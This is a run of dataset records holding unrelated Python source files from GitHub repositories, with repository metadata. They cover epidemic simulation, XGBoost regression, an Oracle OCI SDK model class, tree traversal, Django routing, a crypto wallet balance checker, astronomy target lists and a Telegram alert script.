print(\"Edges:\", g.edges.size) \n\n\n if model_type == \"SIR\":\n model = SIR\n parameter = 0.1\n target_state = \"R\"\n repeat = 50\n elif model_type == \"TippingModel\":\n model = TippingModel\n parameter = 0.1\n target_state = \"Active\"\n repeat = 1\n \n for _ in range(15):\n seed = randrange(g.n_nodes)\n number_of_infected = []\n for _ in tqdm(range(repeat)):\n number_of_infected.append(run(g, seed, model, parameter, target_state))\n \n print(g.node_numbers[seed], \":\", sum(number_of_infected)/len(number_of_infected))\n\n \nif __name__ == \"__main__\":\n main()\n", "repo_name": "PetraVidnerova/soil_playground", "sub_path": "test_model.py", "file_name": "test_model.py", "file_ext": "py", "file_size_in_byte": 1464, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "model.set_graph", "line_number": 14, "usage_type": "call"}, {"api_name": "model.setup", "line_number": 15, "usage_type": "call"}, {"api_name": "sir.S", "line_number": 15, "usage_type": "argument"}, {"api_name": "model.node_states", "line_number": 16, "usage_type": "attribute"}, {"api_name": "sir.I", "line_number": 16, "usage_type": "name"}, {"api_name": "model.iterate", "line_number": 20, "usage_type": "call"}, {"api_name": "model.history_to_df", "line_number": 23, "usage_type": "call"}, {"api_name": "model.Graph", "line_number": 34, "usage_type": "call"}, {"api_name": "sir.SIR", "line_number": 41, "usage_type": "name"}, {"api_name": "tipping.TippingModel", "line_number": 46, "usage_type": "name"}, {"api_name": "random.randrange", "line_number": 52, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 54, "usage_type": "call"}, {"api_name": "click.command", "line_number": 29, "usage_type": "call"}, {"api_name": "click.option", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "10652492747", "text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom xgboost.sklearn import XGBRegressor\n\nfrom Utils.Model import get_distribution\nfrom sklearn.model_selection import KFold\nfrom sklearn.metrics import mean_squared_error\n\n\nclass XGBoostRegressionModel() :\n def __init__( self , name):\n self.model = XGBRegressor(n_estimators=1000, max_depth=10, learning_rate=0.001, random_state=0)\n\n def train(self, X,y, label, configs):\n\n X.reset_index()\n y.reset_index()\n distrs = [get_distribution(y)]\n index = ['Entire set']\n\n tprs = []\n aucs = []\n mean_fpr = np.linspace(0, 1, 10) #CROSS VALIDATION CHANGE\n plt.figure(figsize=(10, 10))\n\n outcome_df = pd.DataFrame()\n\n kf = KFold(n_splits=5)\n\n for train_index, test_index in kf.split(X) :\n training_X, testing_X = X.iloc[train_index], X.iloc[test_index]\n training_y, testing_y = y.iloc[train_index], y.iloc[test_index]\n\n # Train, predict and Plot\n self.model.fit(training_X,training_y)\n #y_pred_rt = self.model.predict_proba(testing_X)[:, 1]\n y_pred_rt = self.model.predict(testing_X)\n\n mse = mean_squared_error(testing_y, y_pred_rt) ** (0.5)\n\n performance_row = {\n \"Mean Square Error\" : mse\n }\n\n outcome_df = outcome_df.append(performance_row, ignore_index=True)\n outcome_df.to_csv(\"Outcomes/\"+label+\"RegressionStudent.csv\")\n\n distr_df = pd.DataFrame(distrs, index=index, columns=[f'Label {l}' for l in range(np.max(y) + 1)])\n distr_df.to_csv(configs['model']['save_dir'] +\"-K-Fold-Distributions.csv\", index=True)\n", "repo_name": "zibrahim/TeacherStudentOutcomePrediction", "sub_path": "Models/XGBoostRegressor/Model.py", "file_name": "Model.py", "file_ext": "py", "file_size_in_byte": 1707, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "xgboost.sklearn.XGBRegressor", "line_number": 13, "usage_type": "call"}, {"api_name": "Utils.Model.get_distribution", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 25, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 25, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 27, "usage_type": "call"}, {"api_name": "sklearn.model_selection.KFold", "line_number": 29, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 40, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 49, "usage_type": "call"}]} +{"seq_id": "31595877709", "text": "from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass LogAnalyticsEntityType(object):\n \"\"\"\n Description of log analytics entity type.\n \"\"\"\n\n #: A constant which can be used with the cloud_type property of a LogAnalyticsEntityType.\n #: This constant has a value of \"CLOUD\"\n CLOUD_TYPE_CLOUD = \"CLOUD\"\n\n #: A constant which can be used with the cloud_type property of a LogAnalyticsEntityType.\n #: This constant has a value of \"NON_CLOUD\"\n CLOUD_TYPE_NON_CLOUD = \"NON_CLOUD\"\n\n #: A constant which can be used with the cloud_type property of a LogAnalyticsEntityType.\n #: This constant has a value of \"ALL\"\n CLOUD_TYPE_ALL = \"ALL\"\n\n #: A constant which can be used with the lifecycle_state property of a LogAnalyticsEntityType.\n #: This constant has a value of \"ACTIVE\"\n LIFECYCLE_STATE_ACTIVE = \"ACTIVE\"\n\n #: A constant which can be used with the lifecycle_state property of a LogAnalyticsEntityType.\n #: This constant has a value of \"DELETED\"\n LIFECYCLE_STATE_DELETED = \"DELETED\"\n\n #: A constant which can be used with the management_agent_eligibility_status property of a LogAnalyticsEntityType.\n #: This constant has a value of \"ELIGIBLE\"\n MANAGEMENT_AGENT_ELIGIBILITY_STATUS_ELIGIBLE = \"ELIGIBLE\"\n\n #: A constant which can be used with the management_agent_eligibility_status property of a LogAnalyticsEntityType.\n #: This constant has a value of \"INELIGIBLE\"\n MANAGEMENT_AGENT_ELIGIBILITY_STATUS_INELIGIBLE = \"INELIGIBLE\"\n\n #: A constant which can be used with the management_agent_eligibility_status property of a LogAnalyticsEntityType.\n #: This constant has a value of \"UNKNOWN\"\n MANAGEMENT_AGENT_ELIGIBILITY_STATUS_UNKNOWN = \"UNKNOWN\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new LogAnalyticsEntityType object with values from keyword arguments.\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param name:\n The value to assign to the name property of this LogAnalyticsEntityType.\n :type name: str\n\n :param internal_name:\n The value to assign to the internal_name property of this LogAnalyticsEntityType.\n :type internal_name: str\n\n :param compartment_id:\n The value to assign to the compartment_id property of this LogAnalyticsEntityType.\n :type compartment_id: str\n\n :param category:\n The value to assign to the category property of this LogAnalyticsEntityType.\n :type category: str\n\n :param cloud_type:\n The value to assign to the cloud_type property of this LogAnalyticsEntityType.\n Allowed values for this property are: \"CLOUD\", \"NON_CLOUD\", \"ALL\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n :type cloud_type: str\n\n :param properties:\n The value to assign to the properties property of this LogAnalyticsEntityType.\n :type properties: list[oci.log_analytics.models.EntityTypeProperty]\n\n :param lifecycle_state:\n The value to assign to the lifecycle_state property of this LogAnalyticsEntityType.\n Allowed values for this property are: \"ACTIVE\", \"DELETED\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n :type lifecycle_state: str\n\n :param time_created:\n The value to assign to the time_created property of this LogAnalyticsEntityType.\n :type time_created: datetime\n\n :param time_updated:\n The value to assign to the time_updated property of this LogAnalyticsEntityType.\n :type time_updated: datetime\n\n :param management_agent_eligibility_status:\n The value to assign to the management_agent_eligibility_status property of this LogAnalyticsEntityType.\n Allowed values for this property are: \"ELIGIBLE\", \"INELIGIBLE\", \"UNKNOWN\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n :type management_agent_eligibility_status: str\n\n \"\"\"\n self.swagger_types = {\n 'name': 'str',\n 'internal_name': 'str',\n 'compartment_id': 'str',\n 'category': 'str',\n 'cloud_type': 'str',\n 'properties': 'list[EntityTypeProperty]',\n 'lifecycle_state': 'str',\n 'time_created': 'datetime',\n 'time_updated': 'datetime',\n 'management_agent_eligibility_status': 'str'\n }\n\n self.attribute_map = {\n 'name': 'name',\n 'internal_name': 'internalName',\n 'compartment_id': 'compartmentId',\n 'category': 'category',\n 'cloud_type': 'cloudType',\n 'properties': 'properties',\n 'lifecycle_state': 'lifecycleState',\n 'time_created': 'timeCreated',\n 'time_updated': 'timeUpdated',\n 'management_agent_eligibility_status': 'managementAgentEligibilityStatus'\n }\n\n self._name = None\n self._internal_name = None\n self._compartment_id = None\n self._category = None\n self._cloud_type = None\n self._properties = None\n self._lifecycle_state = None\n self._time_created = None\n self._time_updated = None\n self._management_agent_eligibility_status = None\n\n @property\n def name(self):\n \"\"\"\n **[Required]** Gets the name of this LogAnalyticsEntityType.\n Log analytics entity type name.\n\n\n :return: The name of this LogAnalyticsEntityType.\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"\n Sets the name of this LogAnalyticsEntityType.\n Log analytics entity type name.\n\n\n :param name: The name of this LogAnalyticsEntityType.\n :type: str\n \"\"\"\n self._name = name\n\n @property\n def internal_name(self):\n \"\"\"\n **[Required]** Gets the internal_name of this LogAnalyticsEntityType.\n Internal name for the log analytics entity type.\n\n\n :return: The internal_name of this LogAnalyticsEntityType.\n :rtype: str\n \"\"\"\n return self._internal_name\n\n @internal_name.setter\n def internal_name(self, internal_name):\n \"\"\"\n Sets the internal_name of this LogAnalyticsEntityType.\n Internal name for the log analytics entity type.\n\n\n :param internal_name: The internal_name of this LogAnalyticsEntityType.\n :type: str\n \"\"\"\n self._internal_name = internal_name\n\n @property\n def compartment_id(self):\n \"\"\"\n Gets the compartment_id of this LogAnalyticsEntityType.\n Compartment Identifier `OCID]`__.\n\n __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm\n\n\n :return: The compartment_id of this LogAnalyticsEntityType.\n :rtype: str\n \"\"\"\n return self._compartment_id\n\n @compartment_id.setter\n def compartment_id(self, compartment_id):\n \"\"\"\n Sets the compartment_id of this LogAnalyticsEntityType.\n Compartment Identifier `OCID]`__.\n\n __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm\n\n\n :param compartment_id: The compartment_id of this LogAnalyticsEntityType.\n :type: str\n \"\"\"\n self._compartment_id = compartment_id\n\n @property\n def category(self):\n \"\"\"\n **[Required]** Gets the category of this LogAnalyticsEntityType.\n Log analytics entity type category. Category will be used for grouping and filtering.\n\n\n :return: The category of this LogAnalyticsEntityType.\n :rtype: str\n \"\"\"\n return self._category\n\n @category.setter\n def category(self, category):\n \"\"\"\n Sets the category of this LogAnalyticsEntityType.\n Log analytics entity type category. Category will be used for grouping and filtering.\n\n\n :param category: The category of this LogAnalyticsEntityType.\n :type: str\n \"\"\"\n self._category = category\n\n @property\n def cloud_type(self):\n \"\"\"\n **[Required]** Gets the cloud_type of this LogAnalyticsEntityType.\n Log analytics entity type group. That can be CLOUD (OCI) or NON_CLOUD otherwise.\n\n Allowed values for this property are: \"CLOUD\", \"NON_CLOUD\", \"ALL\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n\n\n :return: The cloud_type of this LogAnalyticsEntityType.\n :rtype: str\n \"\"\"\n return self._cloud_type\n\n @cloud_type.setter\n def cloud_type(self, cloud_type):\n \"\"\"\n Sets the cloud_type of this LogAnalyticsEntityType.\n Log analytics entity type group. That can be CLOUD (OCI) or NON_CLOUD otherwise.\n\n\n :param cloud_type: The cloud_type of this LogAnalyticsEntityType.\n :type: str\n \"\"\"\n allowed_values = [\"CLOUD\", \"NON_CLOUD\", \"ALL\"]\n if not value_allowed_none_or_none_sentinel(cloud_type, allowed_values):\n cloud_type = 'UNKNOWN_ENUM_VALUE'\n self._cloud_type = cloud_type\n\n @property\n def properties(self):\n \"\"\"\n Gets the properties of this LogAnalyticsEntityType.\n The parameters used in file patterns specified in log sources for this log analytics entity type.\n\n\n :return: The properties of this LogAnalyticsEntityType.\n :rtype: list[oci.log_analytics.models.EntityTypeProperty]\n \"\"\"\n return self._properties\n\n @properties.setter\n def properties(self, properties):\n \"\"\"\n Sets the properties of this LogAnalyticsEntityType.\n The parameters used in file patterns specified in log sources for this log analytics entity type.\n\n\n :param properties: The properties of this LogAnalyticsEntityType.\n :type: list[oci.log_analytics.models.EntityTypeProperty]\n \"\"\"\n self._properties = properties\n\n @property\n def lifecycle_state(self):\n \"\"\"\n **[Required]** Gets the lifecycle_state of this LogAnalyticsEntityType.\n The current lifecycle state of the log analytics entity.\n\n Allowed values for this property are: \"ACTIVE\", \"DELETED\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n\n\n :return: The lifecycle_state of this LogAnalyticsEntityType.\n :rtype: str\n \"\"\"\n return self._lifecycle_state\n\n @lifecycle_state.setter\n def lifecycle_state(self, lifecycle_state):\n \"\"\"\n Sets the lifecycle_state of this LogAnalyticsEntityType.\n The current lifecycle state of the log analytics entity.\n\n\n :param lifecycle_state: The lifecycle_state of this LogAnalyticsEntityType.\n :type: str\n \"\"\"\n allowed_values = [\"ACTIVE\", \"DELETED\"]\n if not value_allowed_none_or_none_sentinel(lifecycle_state, allowed_values):\n lifecycle_state = 'UNKNOWN_ENUM_VALUE'\n self._lifecycle_state = lifecycle_state\n\n @property\n def time_created(self):\n \"\"\"\n **[Required]** Gets the time_created of this LogAnalyticsEntityType.\n Time the log analytics entity type was created. An RFC3339 formatted datetime string.\n\n\n :return: The time_created of this LogAnalyticsEntityType.\n :rtype: datetime\n \"\"\"\n return self._time_created\n\n @time_created.setter\n def time_created(self, time_created):\n \"\"\"\n Sets the time_created of this LogAnalyticsEntityType.\n Time the log analytics entity type was created. An RFC3339 formatted datetime string.\n\n\n :param time_created: The time_created of this LogAnalyticsEntityType.\n :type: datetime\n \"\"\"\n self._time_created = time_created\n\n @property\n def time_updated(self):\n \"\"\"\n **[Required]** Gets the time_updated of this LogAnalyticsEntityType.\n Time the log analytics entity type was updated. An RFC3339 formatted datetime string.\n\n\n :return: The time_updated of this LogAnalyticsEntityType.\n :rtype: datetime\n \"\"\"\n return self._time_updated\n\n @time_updated.setter\n def time_updated(self, time_updated):\n \"\"\"\n Sets the time_updated of this LogAnalyticsEntityType.\n Time the log analytics entity type was updated. An RFC3339 formatted datetime string.\n\n\n :param time_updated: The time_updated of this LogAnalyticsEntityType.\n :type: datetime\n \"\"\"\n self._time_updated = time_updated\n\n @property\n def management_agent_eligibility_status(self):\n \"\"\"\n Gets the management_agent_eligibility_status of this LogAnalyticsEntityType.\n This field indicates whether logs for entities of this type can be collected using a management agent.\n\n Allowed values for this property are: \"ELIGIBLE\", \"INELIGIBLE\", \"UNKNOWN\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n\n\n :return: The management_agent_eligibility_status of this LogAnalyticsEntityType.\n :rtype: str\n \"\"\"\n return self._management_agent_eligibility_status\n\n @management_agent_eligibility_status.setter\n def management_agent_eligibility_status(self, management_agent_eligibility_status):\n \"\"\"\n Sets the management_agent_eligibility_status of this LogAnalyticsEntityType.\n This field indicates whether logs for entities of this type can be collected using a management agent.\n\n\n :param management_agent_eligibility_status: The management_agent_eligibility_status of this LogAnalyticsEntityType.\n :type: str\n \"\"\"\n allowed_values = [\"ELIGIBLE\", \"INELIGIBLE\", \"UNKNOWN\"]\n if not value_allowed_none_or_none_sentinel(management_agent_eligibility_status, allowed_values):\n management_agent_eligibility_status = 'UNKNOWN_ENUM_VALUE'\n self._management_agent_eligibility_status = management_agent_eligibility_status\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n", "repo_name": "oracle/oci-python-sdk", "sub_path": "src/oci/log_analytics/models/log_analytics_entity_type.py", "file_name": "log_analytics_entity_type.py", "file_ext": "py", "file_size_in_byte": 14688, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 345, "dataset": "github-code", "pt": "52", "api": [{"api_name": "oci.util.value_allowed_none_or_none_sentinel", "line_number": 258, "usage_type": "call"}, {"api_name": "oci.util.value_allowed_none_or_none_sentinel", "line_number": 312, "usage_type": "call"}, {"api_name": "oci.util.value_allowed_none_or_none_sentinel", "line_number": 390, "usage_type": "call"}, {"api_name": "oci.util.formatted_flat_dict", "line_number": 395, "usage_type": "call"}, {"api_name": "oci.decorators.init_model_state_from_kwargs", "line_number": 5, "usage_type": "name"}]} +{"seq_id": "33549468774", "text": "from dataclasses import dataclass\nfrom typing import Any, Optional\n\n\n@dataclass\nclass TreeNode:\n val: Any\n left: Optional[\"TreeNode\"] = None\n right: Optional[\"TreeNode\"] = None\n parent: Optional[\"TreeNode\"] = None\n\n\ndef get_successor_node(node: TreeNode):\n \"\"\"获取给定节点的后继节点, 后继节点指中序遍历中x的下一个节点\"\"\"\n # ��父节点的左子节点, 那么后继节点就是父节点\n if node.parent and node is node.parent.left:\n return node.parent\n # 有右子节点, 那么后继节点就在右子节点的最左边\n elif node.right:\n n1 = node.right\n while n1:\n n1 = n1.left\n return n1\n else:\n # 既不是父节点的左子节点, 也没有右节点, 只能是树中某个节点的最右边\n parent = node.parent\n while parent and parent.right is node:\n node = parent\n parent = parent.parent\n return parent\n", "repo_name": "LCW-QAQ/algorithme", "sub_path": "src/tree/tree_successor.py", "file_name": "tree_successor.py", "file_ext": "py", "file_size_in_byte": 960, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.Any", "line_number": 7, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 8, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 9, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 10, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 5, "usage_type": "name"}]} +{"seq_id": "38773588571", "text": "import time\nimport json\nfrom os import path\nfrom getpass import getuser\nfrom platform import node\n\nVERSION = (16, 6, 4)\nAPPNAME = 'tsdesktop'\n\nbuildinfo = {\n 'TIME': None,\n}\nbinfoFile = path.join(path.dirname(__file__), 'buildinfo.json')\n\ndef writeBuildInfo():\n global buildinfo\n buildinfo['TIME'] = time.time()\n buildinfo['AUTHOR'] = getuser()\n buildinfo['HOSTNAME'] = node()\n with open(binfoFile, 'w') as fh:\n json.dump(buildinfo, fh)\n fh.close()\n\ndef readBuildInfo():\n global buildinfo\n try:\n with open(binfoFile, 'r') as fh:\n buildinfo = json.load(fh)\n fh.close()\n except IOError: # coverage: exclude\n pass\n\ndef _version():\n return '.'.join([str(i) for i in VERSION])\n\ndef string():\n readBuildInfo()\n v = \"{} v{}\".format(APPNAME, _version())\n if buildinfo['TIME'] is not None:\n v = \"{} ({} {}@{})\".format(\n v,\n time.strftime('%d%b%Y', time.localtime(buildinfo['TIME'])),\n buildinfo['AUTHOR'],\n buildinfo['HOSTNAME'],\n )\n return v\n\ndef println():\n print(string())\n\nif __name__ == '__main__': # coverage: exclude\n println()\n", "repo_name": "tsadm/desktop", "sub_path": "lib/tsdesktop/version.py", "file_name": "version.py", "file_ext": "py", "file_size_in_byte": 1182, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "time.time", "line_number": 17, "usage_type": "call"}, {"api_name": "getpass.getuser", "line_number": 18, "usage_type": "call"}, {"api_name": "platform.node", "line_number": 19, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 21, "usage_type": "call"}, {"api_name": "json.load", "line_number": 28, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 42, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "14336307957", "text": "from django.contrib.auth.models import User\nfrom django.core.urlresolvers import reverse\nfrom django.template.defaultfilters import slugify\nfrom django.test import TestCase\n\nfrom ..models import Post\n\n\nclass BlogTests(TestCase):\n\n def setUp(self):\n self.user = User.objects.create(username='test')\n\n def create_post(self, title='Test Blog Post', published=True):\n return Post.objects.create(\n title=title,\n author=self.user,\n published=published\n )\n\n def test_model_creation(self):\n post = self.create_post()\n self.assertTrue(isinstance(post, Post))\n self.assertEqual(post.__unicode__(), post.title)\n self.assertEqual(post.slug, slugify(post.title))\n\n def test_model_url(self):\n post = self.create_post()\n self.assertEqual(post.get_absolute_url(),\n reverse('blog:detail', kwargs={'slug': post.slug}))\n\n def test_model_manager(self):\n live_post = self.create_post()\n draft_post = self.create_post(title='Draft Post',\n published=False)\n self.assertIn(live_post, Post.objects.live())\n self.assertNotIn(draft_post, Post.objects.live())\n\n def test_custom_slug(self):\n post = Post.objects.create(\n title='A Post with a Custom Slug',\n slug='fizzbuzz',\n author=self.user\n )\n self.assertNotEqual(post.slug, slugify(post.title))\n self.assertEqual(post.slug, 'fizzbuzz')\n", "repo_name": "kennethlove/Getting-Started-With-Django", "sub_path": "blog/tests/test_models.py", "file_name": "test_models.py", "file_ext": "py", "file_size_in_byte": 1485, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 46, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.test.TestCase", "line_number": 9, "usage_type": "name"}, {"api_name": "django.contrib.auth.models.User.objects.create", "line_number": 12, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 12, "usage_type": "name"}, {"api_name": "models.Post.objects.create", "line_number": 15, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 15, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 15, "usage_type": "name"}, {"api_name": "models.Post", "line_number": 23, "usage_type": "argument"}, {"api_name": "django.template.defaultfilters.slugify", "line_number": 25, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 30, "usage_type": "call"}, {"api_name": "models.Post.objects.live", "line_number": 36, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 36, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 36, "usage_type": "name"}, {"api_name": "models.Post.objects.live", "line_number": 37, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 37, "usage_type": "name"}, {"api_name": "models.Post.objects.create", "line_number": 40, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 40, "usage_type": "name"}, {"api_name": "django.template.defaultfilters.slugify", "line_number": 45, "usage_type": "call"}]} +{"seq_id": "1160453927", "text": "from pycoingecko import CoinGeckoAPI\nfrom traceback import print_exc\n\ncg = CoinGeckoAPI()\n\ndef crypto_balance(address: str, id: str, currency: str, web3_provider: str):\n \"\"\"\n Returns ETH, BTC and BNB balance of given wallet\n\n address: metamask wallet address\n id: coingecko coin' id\n currency: BRL|USD\n web3_provider: infura | bsc\n \"\"\"\n try:\n address = web3_provider.toChecksumAddress(address)\n coin = web3_provider.eth.getBalance(address.strip())\n qtd = float(web3_provider.fromWei(coin, \"ether\").to_eng_string())\n price = cg.get_price(ids=id, vs_currencies=currency)[id][currency]\n balance = qtd * price\n except Exception as e:\n print(\"The following error occurred:\\n\")\n print(e.__class__.__name__)\n print_exc()\n return \"\"\n\n return balance\n\n\ndef token_balance(\n address: str, contract: str, abi: str, id: str, currency: str, web3_provider: str\n):\n \"\"\"\n Returns any token balance based on contract and abi\n\n address: metamask wallet address\n contract: token contract address\n id: coingecko coin' id\n currency: BRL|USD\n web3_provider: infura | bsc\n \"\"\"\n try:\n token_address = web3_provider.toChecksumAddress(contract)\n wallet_address = web3_provider.toChecksumAddress(address)\n token = web3_provider.eth.contract(address=token_address, abi=abi)\n token_balance = token.functions.balanceOf(wallet_address).call()\n qtd = float(web3_provider.fromWei(token_balance, \"ether\").to_eng_string())\n price = cg.get_price(ids=id, vs_currencies=currency)[id][currency]\n balance = qtd * price\n except Exception as e:\n print(\"The following error occurred:\\n\")\n print(e.__class__.__name__)\n print_exc()\n return \"\"\n\n return balance\n", "repo_name": "Hidra-Tech/smallFish", "sub_path": "check_wallet.py", "file_name": "check_wallet.py", "file_ext": "py", "file_size_in_byte": 1820, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pycoingecko.CoinGeckoAPI", "line_number": 4, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 24, "usage_type": "call"}, {"api_name": "traceback.print_exc", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "5628847721", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 29 04:44:52 2022\n\n@author: porri\n\"\"\"\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom astropy.coordinates import SkyCoord\nimport astropy.units as u\nfrom copy import deepcopy\nimport os\nfrom utilly import *\nimport requests\n\npackage_directory = os.path.dirname(os.path.abspath(__file__)) + '/'\n\ndef get_target_list():\n # call = 'wget \"https://docs.google.com/spreadsheets/d/1JPIAXjcy-maVeNMkImRHFnhfoo2ulJQzHkCJOL0AbKs/export?format=csv&gid=0\" -O \"{}debass.csv\"'.format(package_directory)\n\n #os.system(call)\n URL = \"https://docs.google.com/spreadsheets/d/1JPIAXjcy-maVeNMkImRHFnhfoo2ulJQzHkCJOL0AbKs/export?format=csv&gid=0\"\n \n test = requests.get(URL)\n open('debass.csv', 'wb').write(test.content)\n\n df = pd.read_csv('debass.csv')\n follow_ind = df['Following?'].values == 'YES'\n df = df.iloc[follow_ind]\n\n # call = 'rm -rf {}debass.csv'.format(package_directory)\n # os.system(call)\n return df\n\n\ndef make_debass_entries(debass,exptime=300,readout=40,filters=['R','V']):\n obs = []\n for j in range(len(debass)):\n l = debass.iloc[j]\n repeats = 1\n ra = l.RA\n dec = l.DEC\n name = l['snid'] + '_22S05'\n priority = l['priority']\n for f in filters:\n ob = make_obs_entry(exptime,f,repeats,name,ra,dec,propid='2022S-05',priority=priority)\n obs += [ob]\n return obs \n \n\ndef debas_priority(debass,names=None):\n \n debass['priority'] = int(2)\n\n if names is not None:\n for i in range(len(names)):\n name = names[i]\n for j in range(len(debass)):\n if name[0] in debass.iloc[j]['Target Name']:\n debass['priority'].iloc[j] = int(name[1])\n\n return debass\n\n\ndef make_debass_list(name_priority=None):\n date = get_today()\n\n save_path = package_directory + 'targets/' + date\n\n make_dir(save_path)\n\n df = get_target_list()\n df = debas_priority(df,names = name_priority)\n debass = make_debass_entries(df)\n save_targs(debass,save_path + '/debass.json')\n print('!!! Made DEBASS target list for ' + date + ' !!!')\n\n\nif __name__ == '__main__':\n make_debass_list()", "repo_name": "CheerfulUser/otehiwai_po", "sub_path": "otehiwai_po/debass_targets.py", "file_name": "debass_targets.py", "file_ext": "py", "file_size_in_byte": 2236, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.dirname", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 19, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 30, "usage_type": "call"}]} +{"seq_id": "20945048849", "text": "from django.urls import path\n\nfrom . import views\n\napp_name = 'students'\n\nurlpatterns = [\n path('', views.SearchPINView.as_view(), name='search_pin'),\n path('tutorial/', views.StudentTutorial.as_view(), name='tutorial'),\n path('prova/<str:pin>/', views.ExamView.as_view(), name='exam'),\n path('prova/<str:pin>/<str:question>',\n views.QuestionView.as_view(), name='question'),\n path('enunciado/<str:question>/<path:path>/',\n views.pdf_view, name='statement')\n]\n", "repo_name": "Robertoskb/CodeScore", "sub_path": "students/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 491, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "30009638514", "text": "import connect\nimport asyncio\nfrom json import loads\n\nprint('ISEDOL CHAT ALERT START')\n\n# Connect Telegram\nTG = connect.ConnectTG(\"private\") # Input \"private\" or \"public\"\nbot = TG.bot\n\n# Channels\ntrack = (\"vo_ine\", \"jingburger\", \"lilpaaaaaa\", \"cotton__123\", \"gosegugosegu\", \"viichan6\", \"woowakgood\", \"chunyangkr\", \"111roentgenium\")\nisedol_id = (\"vo_ine\", \"jingburger\", \"lilpaaaaaa\", \"cotton__123\", \"gosegugosegu\", \"viichan6\", \"woowakgood\")\nisedol_kr = {\"vo_ine\":\"아이네 ⚪️\", \"jingburger\":\"징버거 🟡\", \"lilpaaaaaa\":\"릴파 🔵\", 